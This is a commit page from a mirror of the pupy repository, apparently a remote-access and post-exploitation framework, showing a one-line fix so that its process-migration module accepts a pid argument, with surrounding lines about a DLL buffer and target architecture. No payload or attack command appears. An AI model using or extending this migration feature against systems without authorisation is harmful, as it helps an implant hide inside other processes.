mirror of https://github.com/n1nj4sec/pupy.git
Merge pull request #42 from deathfantasy/migrate-cmdfix
fix migrate not accepting pid parameter
This commit is contained in:
commit
73d0a9b86d
|
@ -36,7 +36,7 @@ class MigrateModule(PupyModule):
|
||||||
pid=p.pid
|
pid=p.pid
|
||||||
self.success("%s created with pid %s"%(args.create,pid))
|
self.success("%s created with pid %s"%(args.create,pid))
|
||||||
else:
|
else:
|
||||||
pid=args.pid[0]
|
pid=args.pid
|
||||||
dllbuf=b""
|
dllbuf=b""
|
||||||
isProcess64bits=False
|
isProcess64bits=False
|
||||||
#TODO automatically fill ip/port
|
#TODO automatically fill ip/port
|
||||||
|
|
Loading…
Reference in New Issue